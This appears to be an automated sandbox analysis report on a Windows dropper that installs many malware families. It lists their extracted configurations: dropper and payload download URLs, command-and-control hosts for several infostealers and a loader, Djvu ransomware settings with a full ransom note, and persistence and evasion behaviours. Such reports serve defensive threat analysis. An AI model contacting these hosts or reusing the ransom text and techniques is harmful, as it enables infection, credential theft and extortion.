djvu | 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4

Analysis

max time kernel
151s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
12-03-2022 09:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe
Size

9.1MB
MD5

663564f2c43b25ba18bf277ba0b9ab20
SHA1

1f5966a11de1ac03bd39c40292a8d5c0a5bb3d62
SHA256

8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4
SHA512

335486d893bd52a01867bc02776b6baf76fe867289e89b38267da3e5a33ac3c6fdb45c709fa18ba79eae19e8d626ac470e10a33dff50461961e2aebb11ec6879

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

39.9

Botnet

933

https://prophefliloc.tumblr.com/

Attributes

profile_id
933

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

raccoon

Version

1.7.3

Botnet

92be0387873e54dd629b9bfa972c3a9a88e6726c

Attributes

url4cnc
https://t.me/gishsunsetman

rc4.plain

Extracted

Family

raccoon

Botnet

a26fbf1c2d0b49bb23b4438deef490ea1c53ab14

Attributes

url4cnc
http://85.159.212.113/maverixsa
http://185.163.204.81/maverixsa
http://194.180.191.33/maverixsa
http://174.138.11.98/maverixsa
http://194.180.191.44/maverixsa
http://91.219.236.120/maverixsa
https://t.me/maverixsa

rc4.plain

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

PRO1203PRO

144.76.173.68:16125

Attributes

auth_value
7a7fbf2ba1c874d2d5050d9184bd1348

Extracted

Family

vidar

Version

50.7

Botnet

937

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes

profile_id
937

Signatures

Detected Djvu ransomware 8 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5072-281-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5072-284-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5144-280-0x0000000002240000-0x000000000235B000-memory.dmp	family_djvu
behavioral2/memory/5072-278-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5072-276-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/7668-376-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/7668-382-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/7668-370-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3232-184-0x0000000005270000-0x0000000005B96000-memory.dmp	family_glupteba
behavioral2/memory/3232-193-0x0000000000400000-0x000000000309C000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3092 744 rUNdlL32.eXe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3092	744	rUNdlL32.eXe

Raccoon Stealer Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2008-201-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/2008-204-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/2008-205-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/6716-304-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 1832 created 3232 1832 svchost.exe Info.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

description	pid	process	target process
PID 1832 created 3232	1832	svchost.exe	Info.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5344-257-0x0000000001FC0000-0x0000000002004000-memory.dmp	family_onlylogger
behavioral2/memory/5344-258-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Vidar Stealer 3 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/4312-188-0x0000000000400000-0x0000000002CBE000-memory.dmp	family_vidar
behavioral2/memory/4312-189-0x0000000004900000-0x000000000499D000-memory.dmp	family_vidar
behavioral2/memory/440-275-0x0000000000400000-0x00000000004CE000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 35 IoCs

Processes:

Files.exeKRSetp.exeInstall.exejfiag3g_gg.exeFolder.exeInfo.exeInstall_Files.exepub2.exejamesdirect.exeLitever01.exeComplete.exemd9_1sjm.exemsedge.exejfiag3g_gg.exeInfo.exe7E4KGS5KRYdTYM9UbhbVCkXW.exeZh8HfuR0H99IFab95QhRkd_A.exe2u2YsUgpyr8uoBqHizKdCUQM.exefind.exeWRV_nd3147gQ3tPAc_hVHB_8.exe_7j7HuriYtP_9nQOmZOUnbSw.exeUTyTq8w2BBV94iBaBtwpceVf.exeaCtrrIoeuw8gN6TISehzPUES.exeYStoivV3td8fghxqUu2SgpQ_.exeg5B8YLScVV_0zfy7P6hxlaVs.exey8vAvBD8LNXIpwE1EDcwkL93.exe8RKZYsnKNWccv71JTmpromDN.exeLPej8ron26c7SWsJgrCsKxFE.exeUkPQqosaxZEWN_UuknyJ6RgF.exe_XfxA3EI0PT3ie5OHUHFQLMm.execE8kh8YndrJJjfgDiRSXHBuB.exeb2B20UBKQvo9NdMQVBat3qrA.exeUasdIN9S3pk1MBF6e1GkKLMu.exebL85TOQU5EEEmVqgNQhYQtof.exe

pid	process
3380	Files.exe
4556	KRSetp.exe
388	Install.exe
4056	jfiag3g_gg.exe
4600	Folder.exe
3232	Info.exe
4252	Install_Files.exe
4784	pub2.exe
4704	jamesdirect.exe
4312	Litever01.exe
1440	Complete.exe
1756	md9_1sjm.exe
4072	msedge.exe
4980	jfiag3g_gg.exe
3512	Info.exe
2008	7E4KGS5KRYdTYM9UbhbVCkXW.exe
4764	Zh8HfuR0H99IFab95QhRkd_A.exe
2008	7E4KGS5KRYdTYM9UbhbVCkXW.exe
944	2u2YsUgpyr8uoBqHizKdCUQM.exe
1920	find.exe
4596	WRV_nd3147gQ3tPAc_hVHB_8.exe
440	_7j7HuriYtP_9nQOmZOUnbSw.exe
5144	UTyTq8w2BBV94iBaBtwpceVf.exe
5152	aCtrrIoeuw8gN6TISehzPUES.exe
5168	YStoivV3td8fghxqUu2SgpQ_.exe
5208	g5B8YLScVV_0zfy7P6hxlaVs.exe
5216	y8vAvBD8LNXIpwE1EDcwkL93.exe
5284	8RKZYsnKNWccv71JTmpromDN.exe
5304	LPej8ron26c7SWsJgrCsKxFE.exe
5320	UkPQqosaxZEWN_UuknyJ6RgF.exe
5328	_XfxA3EI0PT3ie5OHUHFQLMm.exe
5344	cE8kh8YndrJJjfgDiRSXHBuB.exe
5448	b2B20UBKQvo9NdMQVBat3qrA.exe
5588	UasdIN9S3pk1MBF6e1GkKLMu.exe
5596	bL85TOQU5EEEmVqgNQhYQtof.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Documents\y8vAvBD8LNXIpwE1EDcwkL93.exe	upx
C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe	upx
C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
behavioral2/memory/1756-163-0x0000000000400000-0x000000000060D000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

g5B8YLScVV_0zfy7P6hxlaVs.exey8vAvBD8LNXIpwE1EDcwkL93.exe8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exeFolder.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	g5B8YLScVV_0zfy7P6hxlaVs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	y8vAvBD8LNXIpwE1EDcwkL93.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3324 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3324	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 ipinfo.io
229 ipinfo.io
230 ipinfo.io
326 ipinfo.io
342 ipinfo.io
8 ip-api.com
18 ipinfo.io
24 ipinfo.io
327 ipinfo.io
353 ipinfo.io
384 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

7E4KGS5KRYdTYM9UbhbVCkXW.exe

pid process

2008 7E4KGS5KRYdTYM9UbhbVCkXW.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

jamesdirect.exe

description pid process target process

PID 4704 set thread context of 2008 4704 jamesdirect.exe 7E4KGS5KRYdTYM9UbhbVCkXW.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
17	ipinfo.io
229	ipinfo.io
230	ipinfo.io
326	ipinfo.io
342	ipinfo.io
8	ip-api.com
18	ipinfo.io
24	ipinfo.io
327	ipinfo.io
353	ipinfo.io
384	ipinfo.io

pid	process
2008	7E4KGS5KRYdTYM9UbhbVCkXW.exe

description	pid	process	target process
PID 4704 set thread context of 2008	4704	jamesdirect.exe	7E4KGS5KRYdTYM9UbhbVCkXW.exe

Program crash 22 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3644	3324	WerFault.exe	rundll32.exe
3896	2008	WerFault.exe	jamesdirect.exe
5748	4764	WerFault.exe	Zh8HfuR0H99IFab95QhRkd_A.exe
5936	5284	WerFault.exe
6008	5304	WerFault.exe	LPej8ron26c7SWsJgrCsKxFE.exe
3880	5344	WerFault.exe	cE8kh8YndrJJjfgDiRSXHBuB.exe
5952	5304	WerFault.exe	LPej8ron26c7SWsJgrCsKxFE.exe
6332	2008	WerFault.exe	7E4KGS5KRYdTYM9UbhbVCkXW.exe
6496	5344	WerFault.exe	cE8kh8YndrJJjfgDiRSXHBuB.exe
2696	4596	WerFault.exe	WRV_nd3147gQ3tPAc_hVHB_8.exe
7896	6556	WerFault.exe	onGvjMU2m141G5PV7GmGrEm_.exe
7360	6928	WerFault.exe
2500	4764	WerFault.exe	Zh8HfuR0H99IFab95QhRkd_A.exe
8108	6780	WerFault.exe	3LYRJa_h21qcP23mkEqZVhGK.exe
7432	5344	WerFault.exe	cE8kh8YndrJJjfgDiRSXHBuB.exe
3580	7668	WerFault.exe	qwVE9lVPJ5BFPzZyglrA04yI.exe
5416	6928	WerFault.exe	hvjoV9uoVBrkQ52viZaB6CDF.exe
8148	7200	WerFault.exe	mNNTeptv39xQbiKXUFJlGYda.exe
6392	6780	WerFault.exe	3LYRJa_h21qcP23mkEqZVhGK.exe
772	6592	WerFault.exe	bNDiBhKxC6KPXgLxJ0eAvuwe.exe
1712	6140	WerFault.exe	powershell.exe
2552	5344	WerFault.exe	cE8kh8YndrJJjfgDiRSXHBuB.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4220 schtasks.exe
5336 schtasks.exe
6760 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1172 timeout.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

7044 tasklist.exe
7040 tasklist.exe
3580 tasklist.exe
5516 tasklist.exe

pid	process
4220	schtasks.exe
5336	schtasks.exe
6760	schtasks.exe

pid	process
1172	timeout.exe

pid	process
7044	tasklist.exe
7040	tasklist.exe
3580	tasklist.exe
5516	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1408 taskkill.exe
7628 taskkill.exe
Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe

pid	process
1408	taskkill.exe
7628	taskkill.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Litever01.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Litever01.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Litever01.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

jfiag3g_gg.exemsedge.exepub2.exemsedge.exe

pid	process
4980	jfiag3g_gg.exe
4980	jfiag3g_gg.exe
4836	msedge.exe
4836	msedge.exe
4784	pub2.exe
4784	pub2.exe
3696	msedge.exe
3696	msedge.exe
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028
3028

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

4784 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

3696 msedge.exe
3696 msedge.exe
3696 msedge.exe
3696 msedge.exe

pid	process
4784	pub2.exe

pid	process
3696	msedge.exe
3696	msedge.exe
3696	msedge.exe
3696	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Install.exeKRSetp.exetaskkill.exemd9_1sjm.exeInfo.exejamesdirect.exesvchost.exefind.exe

description	pid	process
Token: SeCreateTokenPrivilege	388	Install.exe
Token: SeAssignPrimaryTokenPrivilege	388	Install.exe
Token: SeLockMemoryPrivilege	388	Install.exe
Token: SeIncreaseQuotaPrivilege	388	Install.exe
Token: SeMachineAccountPrivilege	388	Install.exe
Token: SeTcbPrivilege	388	Install.exe
Token: SeSecurityPrivilege	388	Install.exe
Token: SeTakeOwnershipPrivilege	388	Install.exe
Token: SeLoadDriverPrivilege	388	Install.exe
Token: SeSystemProfilePrivilege	388	Install.exe
Token: SeSystemtimePrivilege	388	Install.exe
Token: SeProfSingleProcessPrivilege	388	Install.exe
Token: SeIncBasePriorityPrivilege	388	Install.exe
Token: SeCreatePagefilePrivilege	388	Install.exe
Token: SeCreatePermanentPrivilege	388	Install.exe
Token: SeBackupPrivilege	388	Install.exe
Token: SeRestorePrivilege	388	Install.exe
Token: SeShutdownPrivilege	388	Install.exe
Token: SeDebugPrivilege	388	Install.exe
Token: SeAuditPrivilege	388	Install.exe
Token: SeSystemEnvironmentPrivilege	388	Install.exe
Token: SeChangeNotifyPrivilege	388	Install.exe
Token: SeRemoteShutdownPrivilege	388	Install.exe
Token: SeUndockPrivilege	388	Install.exe
Token: SeSyncAgentPrivilege	388	Install.exe
Token: SeEnableDelegationPrivilege	388	Install.exe
Token: SeManageVolumePrivilege	388	Install.exe
Token: SeImpersonatePrivilege	388	Install.exe
Token: SeCreateGlobalPrivilege	388	Install.exe
Token: 31	388	Install.exe
Token: 32	388	Install.exe
Token: 33	388	Install.exe
Token: 34	388	Install.exe
Token: 35	388	Install.exe
Token: SeDebugPrivilege	4556	KRSetp.exe
Token: SeDebugPrivilege	1408	taskkill.exe
Token: SeManageVolumePrivilege	1756	md9_1sjm.exe
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeDebugPrivilege	3232	Info.exe
Token: SeImpersonatePrivilege	3232	Info.exe
Token: SeDebugPrivilege	4704	jamesdirect.exe
Token: SeTcbPrivilege	1832	svchost.exe
Token: SeTcbPrivilege	1832	svchost.exe
Token: SeManageVolumePrivilege	1756	md9_1sjm.exe
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeDebugPrivilege	1920	find.exe
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028
Token: SeShutdownPrivilege	3028
Token: SeCreatePagefilePrivilege	3028

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

3696 msedge.exe
3696 msedge.exe
3696 msedge.exe

pid	process
3696	msedge.exe
3696	msedge.exe
3696	msedge.exe

Suspicious use of SetWindowsHookEx 18 IoCs

Processes:

Install_Files.exeComplete.exe7E4KGS5KRYdTYM9UbhbVCkXW.exeZh8HfuR0H99IFab95QhRkd_A.exeWRV_nd3147gQ3tPAc_hVHB_8.exe_7j7HuriYtP_9nQOmZOUnbSw.exeUTyTq8w2BBV94iBaBtwpceVf.exeg5B8YLScVV_0zfy7P6hxlaVs.exe_XfxA3EI0PT3ie5OHUHFQLMm.execE8kh8YndrJJjfgDiRSXHBuB.exeb2B20UBKQvo9NdMQVBat3qrA.exey8vAvBD8LNXIpwE1EDcwkL93.exe8RKZYsnKNWccv71JTmpromDN.exeUkPQqosaxZEWN_UuknyJ6RgF.exeYStoivV3td8fghxqUu2SgpQ_.exeLPej8ron26c7SWsJgrCsKxFE.exeUasdIN9S3pk1MBF6e1GkKLMu.exe

pid	process
4252	Install_Files.exe
1440	Complete.exe
2008	7E4KGS5KRYdTYM9UbhbVCkXW.exe
4764	Zh8HfuR0H99IFab95QhRkd_A.exe
4596	WRV_nd3147gQ3tPAc_hVHB_8.exe
440	_7j7HuriYtP_9nQOmZOUnbSw.exe
5144	UTyTq8w2BBV94iBaBtwpceVf.exe
5208	g5B8YLScVV_0zfy7P6hxlaVs.exe
5328	_XfxA3EI0PT3ie5OHUHFQLMm.exe
5344	cE8kh8YndrJJjfgDiRSXHBuB.exe
5448	b2B20UBKQvo9NdMQVBat3qrA.exe
5216	y8vAvBD8LNXIpwE1EDcwkL93.exe
5284	8RKZYsnKNWccv71JTmpromDN.exe
